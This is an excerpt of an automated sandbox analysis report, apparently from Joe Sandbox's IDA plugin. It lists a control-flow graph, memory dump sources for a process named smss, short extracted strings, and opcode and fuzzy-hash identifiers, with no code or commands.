                                                                                        control_flow_graph 1477 7ff88816df48-7ff88816df50 1478 7ff88816df58-7ff88816df83 1477->1478 1482 7ff88816dfac-7ff88816dfb2 1478->1482 1483 7ff88816dfb9-7ff88816dfbf 1482->1483 1484 7ff88816df85-7ff88816df9e 1483->1484 1485 7ff88816dfc1-7ff88816dfc6 1483->1485 1488 7ff88816dfa4-7ff88816dfa9 1484->1488 1489 7ff88816e095-7ff88816e0a5 1484->1489 1486 7ff88816dfcc-7ff88816e001 1485->1486 1487 7ff88816deb3-7ff88816def8 1485->1487 1487->1483 1493 7ff88816defe-7ff88816df04 1487->1493 1488->1482 1495 7ff88816e0a8-7ff88816e0b7 1489->1495 1496 7ff88816e0a7 1489->1496 1497 7ff88816df06 1493->1497 1498 7ff88816deb5-7ff88816e08d 1493->1498 1496->1495 1500 7ff88816df2f-7ff88816df36 1497->1500 1498->1489 1501 7ff88816df08-7ff88816df21 1500->1501 1502 7ff88816df38-7ff88816df43 1500->1502 1501->1489 1504 7ff88816df27-7ff88816df2c 1501->1504 1504->1500
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $r6B
                                                                                        • API String ID: 0-2315467569
                                                                                        • Opcode ID: 2a6ccb7bb1f6b17b46ca44c7d36b37bdabd6f660a3454bf562b7b37965c9b731
                                                                                        • Instruction ID: 4c48637279c5eb40ea47da62181dd3df3f303a6b53b5372c4b89ba3cdd99a178
                                                                                        • Opcode Fuzzy Hash: 2a6ccb7bb1f6b17b46ca44c7d36b37bdabd6f660a3454bf562b7b37965c9b731
                                                                                        • Instruction Fuzzy Hash: 4E412834D0864E9FEB4ADFA4C4959BDBBB1FF58340F5040BAC05AA7296CF396902CB15
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: r6B$r6B
                                                                                        • API String ID: 0-2860294223
                                                                                        • Opcode ID: 41db449e665c8a9a4417046c2b56ceedd59ad7ffd2769ff09f446ce8ae640638
                                                                                        • Instruction ID: a2715409da238b1b1e142b077ab023023a96f39070fd52dde17a694137b3d9a6
                                                                                        • Opcode Fuzzy Hash: 41db449e665c8a9a4417046c2b56ceedd59ad7ffd2769ff09f446ce8ae640638
                                                                                        • Instruction Fuzzy Hash: 5B311E35B0894A8FD758DA5CE4919BCBBE2FF85360B54417AD01ED3682DF24B812CB84
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: r6B$r6B
                                                                                        • API String ID: 0-2860294223
                                                                                        • Opcode ID: 38cdf80ee4dc2a779597ae77a28469eb11efbac77930f54a017f2b4754c26ff5
                                                                                        • Instruction ID: f75f90e39bdc2351afa8abfac8ddc90ea3dde92277d33415206c8343bc17274c
                                                                                        • Opcode Fuzzy Hash: 38cdf80ee4dc2a779597ae77a28469eb11efbac77930f54a017f2b4754c26ff5
                                                                                        • Instruction Fuzzy Hash: 4D31AF35A0894A8FD748DB58D491AACFBE2FF84350F14417AC01ED3686DF24B852CB84
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: r6B$r6B
                                                                                        • API String ID: 0-2860294223
                                                                                        • Opcode ID: 51cbc0533840b6fc37e68a28ca0e2bf8a01be2470e9ca0908c62550a4703e91c
                                                                                        • Instruction ID: dff900162dc16f635acf0df4be4b9bfeecea4b8cd239ae876414824997a90606
                                                                                        • Opcode Fuzzy Hash: 51cbc0533840b6fc37e68a28ca0e2bf8a01be2470e9ca0908c62550a4703e91c
                                                                                        • Instruction Fuzzy Hash: A0314D71A5890A8FDB88DB68D5919BDB7B2FF98350B504139D01ED3682DF24BC12CB85
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: b4B
                                                                                        • API String ID: 0-3849415641
                                                                                        • Opcode ID: 47e6b9d6004ba2e5f15dc9ce066d32f07a36a2971617dee567603e1399aade4d
                                                                                        • Instruction ID: 58b3733d1fb01bf89310b1571b23ba3c52687ff7ea95d7f1f1789d8d45edd58b
                                                                                        • Opcode Fuzzy Hash: 47e6b9d6004ba2e5f15dc9ce066d32f07a36a2971617dee567603e1399aade4d
                                                                                        • Instruction Fuzzy Hash: C6F1D234928656CFEB59CF18C4E06B53BA1FF45350F5446BDC84ACB68ADB38E882CB45
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: b4B
                                                                                        • API String ID: 0-3849415641
                                                                                        • Opcode ID: a3cae29cb96daad3589258dba4d9841168b7ec354be00c81ee0585f38450d6af
                                                                                        • Instruction ID: 08f8f55182fb2e8954984803df6f5051277ebec946c64d0b711d4072c81b9c47
                                                                                        • Opcode Fuzzy Hash: a3cae29cb96daad3589258dba4d9841168b7ec354be00c81ee0585f38450d6af
                                                                                        • Instruction Fuzzy Hash: 61F1B1745186568FEB59CF18C4E46B53BA1FF45310F6442BDC88B8B68ADB38F881CB45
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888150000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: d
                                                                                        • API String ID: 0-2564639436
                                                                                        • Opcode ID: 09c5e1ead7f88b72c5e44f497aae68020411925873921990207330fb82e25e87
                                                                                        • Instruction ID: fe326255ca4e15f31ae3a869f0625660fecf35f38ca770afafd2fd142e5d5f3d
                                                                                        • Opcode Fuzzy Hash: 09c5e1ead7f88b72c5e44f497aae68020411925873921990207330fb82e25e87
                                                                                        • Instruction Fuzzy Hash: C0919C31A18A098BDB9CDE08D485A3677E1FF98340F2445BDD84AC729ADE35F843CB85
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: /B
                                                                                        • API String ID: 0-1225004542
                                                                                        • Opcode ID: 85bb7e0d06009f8e1bc1bb5e213ac3ddb87969301229fba8beeda42558f45ae4
                                                                                        • Instruction ID: 13b374c196c626f3c2287072737b3e872162401a6e6d27b114360488b2408e37
                                                                                        • Opcode Fuzzy Hash: 85bb7e0d06009f8e1bc1bb5e213ac3ddb87969301229fba8beeda42558f45ae4
                                                                                        • Instruction Fuzzy Hash: 40818C74D1C64A8FEB94EBA8C8556FC7BA1FF59380F5401B9D00ED7182DF28A882C705
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: /B
                                                                                        • API String ID: 0-1225004542
                                                                                        • Opcode ID: 75acfb3e8a0d198be6472ca6f5e219d320fd4924a47ee045f5c62735b03d474d
                                                                                        • Instruction ID: 02e1d87f6f325931a312cac5d3e559a684c3d3eaa9af05077fa4293a34aeed7e
                                                                                        • Opcode Fuzzy Hash: 75acfb3e8a0d198be6472ca6f5e219d320fd4924a47ee045f5c62735b03d474d
                                                                                        • Instruction Fuzzy Hash: 47719A34D1C74A8EEB95EB68C854ABDBBA1FF59780F1401BED00ED718ADF286842C745
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2367994017.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff887d70000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: hL_H
                                                                                        • API String ID: 0-3815963757
                                                                                        • Opcode ID: 1a74132a221447335601109afb4270e4a468623301b6827d588c552a159e988f
                                                                                        • Instruction ID: e748729bd493b334eae31ac19f4ae39f30d76aad5e1fd37f84723aebda7282d2
                                                                                        • Opcode Fuzzy Hash: 1a74132a221447335601109afb4270e4a468623301b6827d588c552a159e988f
                                                                                        • Instruction Fuzzy Hash: 5351E531A4CB048FD7589A1CE88667977E1FB99764F14427EE48EC3296DE35AC02C782
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: /B
                                                                                        • API String ID: 0-1225004542
                                                                                        • Opcode ID: 690716c225a54f0ad0904f09dab59807edcbf0f6940c0b6673e1a3ef8acddc3b
                                                                                        • Instruction ID: d716ea19b148390a71b818148d5d95b40e3d169348fb74fe26a701f986c25628
                                                                                        • Opcode Fuzzy Hash: 690716c225a54f0ad0904f09dab59807edcbf0f6940c0b6673e1a3ef8acddc3b
                                                                                        • Instruction Fuzzy Hash: 4F517734D18A4A8EEB96EBA8C4556BDBBB0FF09384F5404BAC05FD7196DF287841C705
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (3K
                                                                                        • API String ID: 0-2224738633
                                                                                        • Opcode ID: ff9edf052d76529213d8ab328251d23f4f9b1ff6496e346058af27f9592c066e
                                                                                        • Instruction ID: 4bc31d5b9544f746786dfe37706e6b2cb6f70a3a6bf43a478f911d917b01becd
                                                                                        • Opcode Fuzzy Hash: ff9edf052d76529213d8ab328251d23f4f9b1ff6496e346058af27f9592c066e
                                                                                        • Instruction Fuzzy Hash: 08510974D08A5E8FDB98EB58C494AB87BF1FB68704F1401BED00EE3695DB346984CB40
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: r6B
                                                                                        • API String ID: 0-2624010786
                                                                                        • Opcode ID: db015bed42651ef97611b13646c54725a3f2d8e8cc5363120ac8bad83de41602
                                                                                        • Instruction ID: 2e55e295e192d4abc8639c43dd2bfca6f6ceae6de0f9db6e28659861c536df38
                                                                                        • Opcode Fuzzy Hash: db015bed42651ef97611b13646c54725a3f2d8e8cc5363120ac8bad83de41602
                                                                                        • Instruction Fuzzy Hash: 51312875F1890A8FD759EB6894615B8BBE1FF44350F40063AD09EC3682DF28BC12C789
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: r6B
                                                                                        • API String ID: 0-2624010786
                                                                                        • Opcode ID: bdea00fbdea4a23ec25ebae41a1721a0a132ec097c1fb62b719c448a402a438a
                                                                                        • Instruction ID: 829495e058fbbf92b562ed499c33d95564009b79aa66f9f7e16ee63d6c5e0343
                                                                                        • Opcode Fuzzy Hash: bdea00fbdea4a23ec25ebae41a1721a0a132ec097c1fb62b719c448a402a438a
                                                                                        • Instruction Fuzzy Hash: BF21D235A0C6894FE749E7A898522A8BBF5FF46390F5401BED14EC71C7EF186806C355
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: r6B
                                                                                        • API String ID: 0-2624010786
                                                                                        • Opcode ID: 72f7fd1183f6d5b2e20d9645ac75a989b8cd60e6a4c36da0345bb3d536f797d3
                                                                                        • Instruction ID: 487c77bae0aeb252fc6b130df80ad0e4d0575e02c71681ae3af2b975bf5798c6
                                                                                        • Opcode Fuzzy Hash: 72f7fd1183f6d5b2e20d9645ac75a989b8cd60e6a4c36da0345bb3d536f797d3
                                                                                        • Instruction Fuzzy Hash: 5E21D325F0CA894FE7959B6898522B87FE1FF463A0F5401BAD05EC79C2DF186806C345
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2367994017.00007FF887D91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff887d91000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 3
                                                                                        • API String ID: 0-4035909810
                                                                                        • Opcode ID: ee1b75885831e93250a4ed5f0be14ab0302113534581f2e9bf6838290968dd47
                                                                                        • Instruction ID: dcc385cb8d6ed1aaf85b1384b629a6e37de2a45b15447589ae0e86019da4632f
                                                                                        • Opcode Fuzzy Hash: ee1b75885831e93250a4ed5f0be14ab0302113534581f2e9bf6838290968dd47
                                                                                        • Instruction Fuzzy Hash: 10217421E8C90F4AE6A5AA9854D577D36E1FF54B84F14837AC80FC31CADE2C6C42C281
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888154000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888154000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888154000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: r6B
                                                                                        • API String ID: 0-2624010786
                                                                                        • Opcode ID: ec33079c92655aee343d812f3ec02546b4faf7c6c8f5f0b2bb0145704667fb0d
                                                                                        • Instruction ID: 20b0bb8fc27929873e1b071d698af1a85a22ba6850648bd7ab9fe716d57de7b8
                                                                                        • Opcode Fuzzy Hash: ec33079c92655aee343d812f3ec02546b4faf7c6c8f5f0b2bb0145704667fb0d
                                                                                        • Instruction Fuzzy Hash: 05213035B08A0A4FD754EA5CD4919B8B7E2FF85760F504279D01ED3682DF24B852C784
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: r6B
                                                                                        • API String ID: 0-2624010786
                                                                                        • Opcode ID: 77b19a22d87f1c33637ab407b05cdf2efbfe26672e046caeec1326f701147b3b
                                                                                        • Instruction ID: a86fad8ccd0737cfa6f9c573631d23288babf23ed2d904b342876970bf5f7e8a
                                                                                        • Opcode Fuzzy Hash: 77b19a22d87f1c33637ab407b05cdf2efbfe26672e046caeec1326f701147b3b
                                                                                        • Instruction Fuzzy Hash: C831D474A1891D9FDF99DA58C4A5AEDB7F1FF68300F0441AED04EE3292DE35A941CB40
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: r6B
                                                                                        • API String ID: 0-2624010786
                                                                                        • Opcode ID: d1372523eed77bc4b062286ae84dc2c745a5d4c1c5efd495ffae7288d9cbf10f
                                                                                        • Instruction ID: 46ccc2096cd690ae7a85d11816c50d774e7d1394da45d551953e7b6bd12360a4
                                                                                        • Opcode Fuzzy Hash: d1372523eed77bc4b062286ae84dc2c745a5d4c1c5efd495ffae7288d9cbf10f
                                                                                        • Instruction Fuzzy Hash: 9631D434A0895D8FDF99DB58C465AA9BBB1FB68300F0041AED04EE7292CF35A981CB41
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: r6B
                                                                                        • API String ID: 0-2624010786
                                                                                        • Opcode ID: c378040bc86f894eedea48f405084a2a43fa968b8c21dd5d219bc54aaab36958
                                                                                        • Instruction ID: 41ff7c7a3bd5eee52a61f773d32e37a664ed49e00e854881e79e93c73f2a2781
                                                                                        • Opcode Fuzzy Hash: c378040bc86f894eedea48f405084a2a43fa968b8c21dd5d219bc54aaab36958
                                                                                        • Instruction Fuzzy Hash: 7321C334E1891D9FDF98EB58C4A5AADB7B1FB68710F0041AE900EE3295CF35A981CB40
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 1
                                                                                        • API String ID: 0-2212294583
                                                                                        • Opcode ID: 3273b9cb49dbb04e906abe0aa6c13301728f4c71b01616406fe4ce5bf8d7f689
                                                                                        • Instruction ID: 2acffed19e5e4b642157c3255f9aa246a1786668472ef8a47dc4240bf44eb05c
                                                                                        • Opcode Fuzzy Hash: 3273b9cb49dbb04e906abe0aa6c13301728f4c71b01616406fe4ce5bf8d7f689
                                                                                        • Instruction Fuzzy Hash: 2011893134864A4FD7168F18E8A57E93BC1FF863A0F5401BFD90AC71D1DBA9AA95C780
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2367994017.00007FF887D91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff887d91000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: M
                                                                                        • API String ID: 0-3664761504
                                                                                        • Opcode ID: 3b7720bc1a930ebb7ea6933b663925879e096b9f058dcb1be1057991f90757aa
                                                                                        • Instruction ID: ae1fe6f52d9b9348fe21b3ca397c1ef5e6a399fe817aa36044f36a455c6b53ea
                                                                                        • Opcode Fuzzy Hash: 3b7720bc1a930ebb7ea6933b663925879e096b9f058dcb1be1057991f90757aa
                                                                                        • Instruction Fuzzy Hash: D7E0657164A7C54FC716D63448694557FA0EF6720174942EFC045CF1A7EA1DC885C701
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2367994017.00007FF887D91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff887d91000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: I
                                                                                        • API String ID: 0-3707901625
                                                                                        • Opcode ID: 8e8c493f8c673022c4c9053ea1782d69934c4c5032262f8377f4b36d83d1de8e
                                                                                        • Instruction ID: 19e32307ae19be5dd4a8f18d9b8fe563193b1b5b7baaf4de53ade4ff8de52df7
                                                                                        • Opcode Fuzzy Hash: 8e8c493f8c673022c4c9053ea1782d69934c4c5032262f8377f4b36d83d1de8e
                                                                                        • Instruction Fuzzy Hash: 73E0E57154E7C04FCB46EA3888699583FA0AE6B21178E41EAC14ACF1A3E62D8849C701
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2367994017.00007FF887D91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff887d91000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: I
                                                                                        • API String ID: 0-3707901625
                                                                                        • Opcode ID: 67745b8a9aa6964b607537d93dcae8cb6f75c2f5c23686521989aee69e694f1b
                                                                                        • Instruction ID: 734b405bb20f78a6ec20183ef61965ed3bbe946f99b262ed17aca20e34fab1f1
                                                                                        • Opcode Fuzzy Hash: 67745b8a9aa6964b607537d93dcae8cb6f75c2f5c23686521989aee69e694f1b
                                                                                        • Instruction Fuzzy Hash: FBE0127194E3C04FDB0AEB3488699553FB1AE6725074A45DEC049CF1B7D62DC849C752
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: r6B
                                                                                        • API String ID: 0-2624010786
                                                                                        • Opcode ID: c0d37d8b00782273520a4520f054683de1d97ab3d703b518ffd20ac8ec141a56
                                                                                        • Instruction ID: 2eea2fca189097f856b05d87d1a099d8eeb4941f8485c92247ac0d947b495068
                                                                                        • Opcode Fuzzy Hash: c0d37d8b00782273520a4520f054683de1d97ab3d703b518ffd20ac8ec141a56
                                                                                        • Instruction Fuzzy Hash: 53D05E85D0D39ADBE76745740CA01781DA0AF177C0F9906B6C19A8B2D3DE887805D32A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b91870a6091d14775dd5bf4eaa40e966d071178b508bde929cfd322a5c91cf2f
                                                                                        • Instruction ID: ac73567c11f81cc9c448ff1a5dc7442c7275895bd13de3208cf8ea4367fb6da9
                                                                                        • Opcode Fuzzy Hash: b91870a6091d14775dd5bf4eaa40e966d071178b508bde929cfd322a5c91cf2f
                                                                                        • Instruction Fuzzy Hash: CB11C619C0C7978AE269A664683457E1D927FA4FC0F1901BED48EC30DADE4C3C40DB8A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f67e06d9964a0095e343c6aaf38c576846b14bf4818b446df75e2c96a89837dd
                                                                                        • Instruction ID: eab161b99a0d8428f43e7e7bb4c423757b9bcb85960e2afe71f071301b774ef6
                                                                                        • Opcode Fuzzy Hash: f67e06d9964a0095e343c6aaf38c576846b14bf4818b446df75e2c96a89837dd
                                                                                        • Instruction Fuzzy Hash: 8271D95AE0C2579AF315AA6CA8111FC6F91BF413A1F190177D05ECA0D3EF0C6946C3AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 054e50d0776cceb286bce54aa7ba29c9b8b0030672eaab8ae0e921fcb0b9c5ac
                                                                                        • Instruction ID: cf1584ee46ad9fa52945db7704a06a1d348e4bccb490792335605b41d2e98ff9
                                                                                        • Opcode Fuzzy Hash: 054e50d0776cceb286bce54aa7ba29c9b8b0030672eaab8ae0e921fcb0b9c5ac
                                                                                        • Instruction Fuzzy Hash: 6CD104307088198FDB98FB5CD0A9FA573D2FBA9754B154168E00EC72A6DE28EC41CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3029f07bfe80ea567dda0a5a979f55d1576d02bf44dd26fb665e794b17b6bfa9
                                                                                        • Instruction ID: 2f0672ea192f89f08bc99b932c704487c808f543a48000fa763e79368b7a12ff
                                                                                        • Opcode Fuzzy Hash: 3029f07bfe80ea567dda0a5a979f55d1576d02bf44dd26fb665e794b17b6bfa9
                                                                                        • Instruction Fuzzy Hash: 37D1DB34A0CA468FE3AADB28D4915B57BE1FF44350F1445BEC48AC7682DF29BC46CB85
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888150000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 71286a57170ecd4a1abac169afef195a171f56f30241c99eab9393961a51c690
                                                                                        • Instruction ID: ca13931e8b0232160b07d2c359b545921fd5b8bda4c4fa528916f1da19322778
                                                                                        • Opcode Fuzzy Hash: 71286a57170ecd4a1abac169afef195a171f56f30241c99eab9393961a51c690
                                                                                        • Instruction Fuzzy Hash: F3D10E3490CA468FE369DB68D4915B8BBE1FF44740F2445BEC48EC7686DF29B842C745
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fa3622a881bfdb1de6c07431c1bcae61e8fe29861c29f0e9c70707e0dce349de
                                                                                        • Instruction ID: 086bb36a28bcb9290dbd2ed47e3b4cab0c1df47b4b099733028aea1da1764a75
                                                                                        • Opcode Fuzzy Hash: fa3622a881bfdb1de6c07431c1bcae61e8fe29861c29f0e9c70707e0dce349de
                                                                                        • Instruction Fuzzy Hash: FCD1EF3892CA468FE36ADB28D4955757BE1FF44344F10457EC48EC7A82DF29B842CB85
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
